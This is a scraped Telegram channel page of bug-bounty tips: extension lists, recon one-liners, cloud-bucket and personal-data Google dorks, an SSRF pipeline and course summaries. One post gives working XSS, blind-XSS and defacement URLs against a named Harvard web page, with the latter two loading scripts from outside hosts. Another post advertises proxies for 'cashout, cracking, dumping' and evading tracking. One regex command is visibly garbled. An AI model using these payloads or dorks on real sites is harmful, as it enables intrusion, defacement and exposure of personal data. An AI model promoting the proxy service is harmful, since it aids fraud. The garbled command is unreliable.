Bug bounty Tips

前往频道在 Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

显示更多

印度58 076 技术与应用17 490

5 799

订阅者

+1424 小时

+777 天

+41130 天

459

帖子浏览量

~ 24024 小时

~ 31048 小时

7.92%

参与率

~ 4

每日帖子数

Ads index

beta

帖子存档

5 801

https://x.com/Cipher0ps_tech/status/1884490778371842240

5 801

🔖Essential Browser Extensions for Bug Bounty Hunters ⬇️FireFox

🔍 Link Gopher 🔍 Adblock Plus 🔍 FoxyProxy Standard 🔍 Video Speed Controller 🔍 Check XSS 🔍 HackTools 🔍 Bulk URL Opener 🔍 Temp Mail 🔍 JS Beautify CSS HTML 🔍 Multi-Account Containers

⬇️Chrome

🌐

TruffleHog

🌐

Code Formatter

🌐

Freedium Extension

🌐

BuiltWith

🌐

Wappalyzer

🌐

WhatRuns

🌐

Retire.js

🌐

Cookie Extractor

🌐

Wayback Machine

🌐

EXIF Data Viwer

🌐

Shodan

🌐

S3 Bucket List

🌐

Ublock Origin

🌐

Resources Saver

🌐

Dot Git

🌐

EndPointer

5 801

iykyk 😂😂😂😂

5 801

Extract all endpoints from a JS File and take your bug 🐞 ✅Method one

waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

✅Method two

cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#infosec #cybersec #bugbountytips

5 801

https://x.com/Cipher0ps_tech/status/1884132830747464168?t=dgFCLHP8SamEbKHR_UOyOw&s=35

5 801

☄️IDOR Cheat Sheet ▶️https://jasper-join-7e5.notion.site/IDOR-Cheat-Sheet-9f7c9e3285bf4c7cae5ea38243cd0391

5 801

🖱Private Anonymous site For Residential Proxy 🖱 Link:- https://legionproxy.io/l/telegram It offers residential proxy,unlimited residential,datacenter proxies, ipv6 proxies and even static proxies at affordable rate you can use it in cashout, cracking,dumping and more it's one of the best proxy service provider out there in whole market guyz even top pro spammer and cracker use it as it implement world class security for it proxies so you can use it without getting tracked Posted by @BugSpy

5 801

Security Certification Roadmap https://pauljerimy.com/security-certification-roadmap/

5 801

⚡Google Dorks - Cloud Storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com" 👉Find buckets and sensitive data. Combine: site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com" Add something to narrow the results: "confidential” “privileged" “not for public release” ✅ Credit- Mike Takahashi

5 801

⚡️LazyXss - Cross site scriptiong Testing Automation Tool v1.2 ✅Link: github.com/iamunixtz/LazyXss

5 801

💻 All About Bug Bounty - Updated! 🔥https://github.com/daffainfo/AllAboutBugBounty #BugBounty #bugbountytips

5 801

OAuth 2.0 Authentication Misconfiguration https://shellmates.medium.com/oauth-2-0-authentication-misconfiguration-dcb811062f1d

5 801

🔖Tiny XSS Payloads - A collection of tiny XSS Payloads that can be used in different contexts. ➡️ The DEMO available here: 🔗 Link 📱 Github: 🔗 Link

5 801

site:target.com ext:xlsx "name" "@gmail.com" "phone"

5 801

Haravard University 🎓 Bug : XSS alert Bug 🤷‍♀️

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E

blind XSS 🤷‍♀️

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E

deface POC :

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/2FD8N5LJDAGNG%3E%3C/script%3E

5 801

⛓ Easily Identify SSRF on a Website Using a Single Command* This approach leverages a combination of powerful tools: - Findomain: Gathers all subdomains related to the target site. - Httpx: Verifies the accessibility of these domains. - Getallurls (gau): Extracts URLs from sources like AlienVault OTX, Wayback Machine, and Common Crawl. - Qsreplace: Substitutes query string values in URLs with a user-specified value. Steps: 1. Install the mentioned tools. 2. Run the following command:

   findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net

Replace your.burpcollaborator.net with your server or Burp Collaborator address. This method streamlines the search for SSRF vulnerabilities effectively. #bugbounty #web #ssrf #cybersecurity #bugbountytips Credit: Aman Dara

5 801

JWT attacks https://juba-notes.notion.site/JWT-attacks-4f62b2b641a84032bc624f8e8432345d

5 801

🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-09 📱 Chapter-9 Network Naming: 🔗 Link 🔗 Previous Chapter 💡Stay tuned for the next chapter—I’ll post it next Friday! #CyberSecurity #bugbounty #Network #infosec 🔸🔸🔸🔸🔸🔸🔸🔸 ⚡ Boost The Channel 🕷 T.me/Spider_Crew 🔸🔸🔸🔸🔸🔸🔸🔸

5 801

🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-08 📱 Chapter-8 TCP/IP Applications: 🔗 Link 🔗 Previous Chapter 💡Stay tuned for the next chapter—I’ll post it next Friday! #CyberSecurity #bugbounty #Network #infosec 🔸🔸🔸🔸🔸🔸🔸🔸 ⚡ Boost The Channel 🕷 T.me/Spider_Crew 🔸🔸🔸🔸🔸🔸🔸🔸